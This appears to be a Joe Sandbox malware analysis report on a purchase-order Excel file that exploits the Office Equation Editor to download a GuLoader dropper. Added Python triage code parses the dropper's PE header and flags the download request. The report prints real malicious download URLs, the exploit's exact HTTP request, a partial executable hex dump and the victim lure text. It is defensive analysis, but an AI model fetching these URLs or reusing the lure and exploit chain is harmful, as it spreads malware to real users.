Windows Analysis Report #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx

Overview

General Information

Sample Name: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx (the #Uxxxx tokens are the sandbox's escaping of non-ASCII characters; the name decodes to "ĐẶT MUA HÀNG VNU_014092021.xlsx", Vietnamese for "PURCHASE ORDER VNU_014092021.xlsx")
Analysis ID: 483661
MD5: 4a1d13469a6c817242e8b567bf34ab9a
SHA1: a0d54f6c1205defad5f31cadf3393880e7c4c862
SHA256: 65514d1bcd58f206fbc6339c7893a4dc5fb3e7de39177038eac73906ec5c622c
Tags: Loki, VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1pn-b6M_RemB"}
Multi AV Scanner detection for submitted file
Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx Virustotal: Detection: 38%
Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx ReversingLabs: Detection: 28%
Antivirus detection for URL or domain
Source: http://23.95.85.181/0789/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://23.95.85.181/0789/vbc.exe Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Virustotal: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 20%
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 36%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 20%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 23.95.85.181:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 23.95.85.181:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 70MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1pn-b6M_RemB
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSING (US)
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 15 Sep 2021 09:06:58 GMT | Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 | Last-Modified: Wed, 15 Sep 2021 06:03:24 GMT | ETag: "1e000-5cc0274c3638e" | Accept-Ranges: bytes | Content-Length: 122880 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
Data Raw (start of the response body, a PE file; dump truncated by the report): 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8b b7 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 01 00 00 40 00 00 00 00 00 00 ac 17 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 01 00 00 10 00 00 60 75 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 a2 01 00 28 00 00 00 00 d0 01 00 f6 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 97 01 00 00 10 00 00 00 a0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 11 00 00 00 b0 01 00 00 10 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f6 16 00 00 00 d0 01 00 00 20 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
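The response above carries the whole first stage: Apache answers with Content-Type application/x-msdownload, a Content-Length of 122880 (the leading 1e000 in the ETag is that same size in hex) and a body that opens with an MZ/PE header in which the strings .text, .data, .rsrc and MSVBVM60.DLL are visible. The Python below is an added example, not part of the Joe Sandbox report, that parses those header bytes the way a triage script or a network sensor would: it follows e_lfanew to the PE signature, reads the PE32 file and optional headers and the section table, checks that the advertised length equals the file size the section table implies (nothing appended after .rsrc), and walks the bound-import directory, which names MSVBVM60.DLL and so identifies the dropper as a Visual Basic 6 binary, consistent with the msvbvm60.dll load recorded later in this report. The byte rows are transcribed from the dump above with zero runs written as zN; the header dict is this example's transcription of the response headers; the finding labels are its own.

```python
import struct

def _hexrows(rows):
    # Turn the transcribed dump into bytes; a token such as z12 stands for twelve 0x00 bytes.
    out = bytearray()
    for tok in " ".join(rows).split():
        out += b"\x00" * int(tok[1:]) if tok.startswith("z") else bytes([int(tok, 16)])
    return bytes(out)

# First 0x248 bytes of the body served for GET /0789/vbc.exe, transcribed from the report's
# "Data Raw" dump (file offsets in the comments). The full file is 122880 bytes.
VBC_EXE_PREFIX = _hexrows([
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00",                   # 0x000 IMAGE_DOS_HEADER
    "b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 z28 b8 00 00 00",   # 0x010 ... e_lfanew=0xb8 at 0x3c
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68",                   # 0x040 DOS stub
    "69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20",
    "6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00",
    "8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88",                   # 0x080 Rich header
    "4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88",
    "00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00",                   # 0x0b0 "PE\0\0", i386, 3 sections
    "90 8b b7 4b 00 00 00 00 00 00 00 00 e0 00 0f 01",                   # 0x0c0 SizeOfOptionalHeader 0xe0
    "0b 01 06 00 00 a0 01 00 00 40 00 00 00 00 00 00",                   # 0x0d0 PE32 optional header
    "ac 17 00 00 00 10 00 00 00 b0 01 00 00 00 40 00",                   # 0x0e0 entry 0x17ac, ImageBase 0x400000
    "00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00",
    "04 00 00 00 00 00 00 00 00 f0 01 00 00 10 00 00",
    "60 75 02 00 02 00 00 00 00 00 10 00 00 10 00 00",                   # 0x110 Subsystem 2 (GUI)
    "00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00",                   # 0x120 16 data directories follow
    "00 00 00 00 00 00 00 00 24 a2 01 00 28 00 00 00",                   # 0x130 export, import
    "00 d0 01 00 f6 16 00 00 z64",                                        # 0x140 resource, 8 empty dirs
    "28 02 00 00 20 00 00 00 00 10 00 00 4c 01 00 00 z24",               # 0x188 bound import, IAT, 3 empty
    "2e 74 65 78 74 00 00 00 60 97 01 00 00 10 00 00 00 a0 01 00 00 10 00 00 z12 20 00 00 60",  # 0x1b0 .text
    "2e 64 61 74 61 00 00 00 9c 11 00 00 00 b0 01 00 00 10 00 00 00 b0 01 00 z12 40 00 00 c0",  # 0x1d8 .data
    "2e 72 73 72 63 00 00 00 f6 16 00 00 00 d0 01 00 00 20 00 00 00 c0 01 00 z12 40 00 00 40",  # 0x200 .rsrc
    "c3 1f b0 49 10 00 00 00 z8 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00",  # 0x228 bound imports
])

# Response headers transcribed from the report.
RESPONSE_HEADERS = {
    "Server": "Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23",
    "Content-Type": "application/x-msdownload",
    "Content-Length": "122880",
}

def parse_pe(data):
    """Follow MZ -> e_lfanew -> PE signature -> optional header -> section table (PE32 only)."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    fh = e_lfanew + 4                                          # IMAGE_FILE_HEADER
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                              # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):                                     # IMAGE_SECTION_HEADER, 40 bytes each
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode(), "vsize": f[1], "va": f[2],
                         "rawsize": f[3], "rawptr": f[4], "chars": f[9]})
    return {"machine": machine, "timestamp": stamp, "characteristics": chars, "entry_point": entry,
            "image_base": image_base, "subsystem": subsystem, "dirs": dirs, "sections": sections}

def bound_imports(data, pe):
    """Module names from IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (index 11); its offsets are file offsets."""
    if len(pe["dirs"]) <= 11 or pe["dirs"][11][0] == 0:
        return []
    base = off = pe["dirs"][11][0]
    names = []
    while True:
        stamp, name_off, nfwd = struct.unpack_from("<IHH", data, off)
        if stamp == 0 and name_off == 0:                       # all-zero descriptor terminates the list
            break
        names.append(data[base + name_off:data.index(b"\0", base + name_off)].decode("ascii"))
        off += 8 * (1 + nfwd)                                  # skip the forwarder refs that follow
    return names

def declared_file_size(pe):
    """End of the last section's raw data: the size the headers say the file on disk has."""
    return max(s["rawptr"] + s["rawsize"] for s in pe["sections"])

def triage_download(headers, body):
    """Combine transport-level and PE-level observations into the findings an analyst would record."""
    pe = parse_pe(body)
    findings = []
    if headers.get("Content-Type", "").lower() == "application/x-msdownload":
        findings.append("server_declares_windows_executable")
    if pe["machine"] == 0x14C:
        findings.append("pe32_i386")
    if int(headers.get("Content-Length", "-1")) == declared_file_size(pe):
        findings.append("content_length_matches_section_table")   # whole PE served, no overlay appended
    if pe["subsystem"] == 2:
        findings.append("gui_subsystem")                           # runs without a console window
    if "MSVBVM60.DLL" in bound_imports(body, pe):
        findings.append("vb6_runtime_bound_import")
    return pe, findings
```

Run against a captured body the parser needs only the first SizeOfHeaders bytes (0x1000 here), so it works on a truncated capture like the report's; on a complete file, comparing declared_file_size with the real length is the quickest way to spot an appended overlay, which this sample does not have.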
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /0789/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 23.95.85.181 | Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.85.181 (this entry appears 50 times in the report, one per connection; no DNS lookup preceded any of them)
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: EA784B99.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA784B99.emf
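Every connection in this section goes to the literal address 23.95.85.181 with no DNS lookup, from an Office component, with an Internet Explorer user-agent string, for a path that ends in .exe. The Python below is an added example, not part of the Joe Sandbox report, that parses the raw request above (CRLFs restored; the sandbox prints the headers run together) and applies those four checks, with a constructed benign browser request as a control to show they stay quiet on ordinary traffic. Attributing the connection to EQNEDT32.EXE follows the report's Sigma signature; the resolved-IP set is what a DNS sensor would have supplied and is empty because the report logged no DNS query; the benign request, its 203.0.113.10 destination, the browser list and the flag names are this example's own.

```python
import ipaddress

# Request transcribed from this report (headers separated with CRLF as on the wire).
GULOADER_STAGE1_REQUEST = (
    "GET /0789/vbc.exe HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\r\n"
    "Host: 23.95.85.181\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

# Constructed control: a browser fetching a page from a host name it resolved first (not from the report).
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/91.0\r\n\r\n"
)

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}   # assumed allow-list
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".cpl")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into request-line fields and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}

def is_ip_literal(host):
    """True when the Host header is an address rather than a name (port and IPv6 brackets tolerated)."""
    host = host.strip()
    if host.startswith("["):
        host = host[1:host.index("]")]
    elif host.count(":") == 1:
        host = host.split(":")[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def assess(raw, dst_ip, process, resolved_ips):
    """Flags that separate this EQNEDT32 download from ordinary browsing; returns the set that fired."""
    req = parse_request(raw)
    h = req["headers"]
    flags = set()
    if is_ip_literal(h.get("host", "")):
        flags.add("host_is_ip_literal")          # no domain, so DNS-based controls never see it
    if dst_ip not in resolved_ips:
        flags.add("connect_without_dns")         # the report logs 50 such connections to 23.95.85.181
    path = req["target"].split("?", 1)[0].lower()
    if path.endswith(PE_EXTENSIONS):
        flags.add("fetches_pe_by_extension")
    if h.get("user-agent", "").startswith("Mozilla/") and process.lower() not in BROWSERS:
        flags.add("browser_ua_from_non_browser")  # browser-style UA, but the client is an Office component
    return flags

if __name__ == "__main__":
    print(sorted(assess(GULOADER_STAGE1_REQUEST, "23.95.85.181", "EQNEDT32.EXE", set())))
    print(sorted(assess(BENIGN_REQUEST, "203.0.113.10", "firefox.exe", {"203.0.113.10"})))
```

The second stage named in the extracted configuration lives on drive.google.com and would pass the IP-literal and DNS checks, so for that hop only the process context (which binary is talking) remains; that is why the flags are kept separate rather than folded into a single score.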

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR (partial; the stray numbers are most likely spreadsheet row labels captured alongside the lure text): Enable Editing from the 16 g yellow bar above ,, This document is 18 3. Once you have enabled edi
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D26BE 6_2_003D26BE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D9AB0 6_2_003D9AB0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0EAE 6_2_003D0EAE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5D1F 6_2_003D5D1F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0746 6_2_003D0746
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0E3C 6_2_003D0E3C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3C3F 6_2_003D3C3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4835 6_2_003D4835
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D9437 6_2_003D9437
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5A2D 6_2_003D5A2D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2E23 6_2_003D2E23
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2C0D 6_2_003D2C0D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8C0F 6_2_003D8C0F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D420F 6_2_003D420F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5E07 6_2_003D5E07
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5003 6_2_003D5003
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D847F 6_2_003D847F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D507A 6_2_003D507A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D1077 6_2_003D1077
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8C73 6_2_003D8C73
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8464 6_2_003D8464
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4266 6_2_003D4266
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D9C63 6_2_003D9C63
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3A50 6_2_003D3A50
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0844 6_2_003D0844
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0847 6_2_003D0847
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D10BD 6_2_003D10BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4CB6 6_2_003D4CB6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3AB1 6_2_003D3AB1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D92B3 6_2_003D92B3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D20A8 6_2_003D20A8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D469F 6_2_003D469F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D149E 6_2_003D149E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D309B 6_2_003D309B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4E8F 6_2_003D4E8F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D46F9 6_2_003D46F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2EFB 6_2_003D2EFB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D48F4 6_2_003D48F4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D46DE 6_2_003D46DE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D9ADB 6_2_003D9ADB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D62C5 6_2_003D62C5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8EC2 6_2_003D8EC2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4B39 6_2_003D4B39
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D493B 6_2_003D493B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D9B3B 6_2_003D9B3B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4523 6_2_003D4523
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D491A 6_2_003D491A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4512 6_2_003D4512
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2B0C 6_2_003D2B0C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3F06 6_2_003D3F06
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D1303 6_2_003D1303
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0973 6_2_003D0973
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4D73 6_2_003D4D73
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D175B 6_2_003D175B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0F57 6_2_003D0F57
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D49BB 6_2_003D49BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D9DB7 6_2_003D9DB7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8FB1 6_2_003D8FB1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D39AB 6_2_003D39AB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4DAB 6_2_003D4DAB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D59A3 6_2_003D59A3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D879B 6_2_003D879B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4D95 6_2_003D4D95
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2F96 6_2_003D2F96
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8D8F 6_2_003D8D8F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4D89 6_2_003D4D89
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5D81 6_2_003D5D81
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3383 6_2_003D3383
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7FFF 6_2_003D7FFF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D51F3 6_2_003D51F3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0DDF 6_2_003D0DDF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D85DA 6_2_003D85DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D61CD 6_2_003D61CD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D11C7 6_2_003D11C7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2DC7 6_2_003D2DC7
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5CD5 9_2_001B5CD5
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B421B 9_2_001B421B
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B2E13 9_2_001B2E13
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4208 9_2_001B4208
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5003 9_2_001B5003
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5E07 9_2_001B5E07
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B9437 9_2_001B9437
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4835 9_2_001B4835
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5A2D 9_2_001B5A2D
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B507A 9_2_001B507A
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8C73 9_2_001B8C73
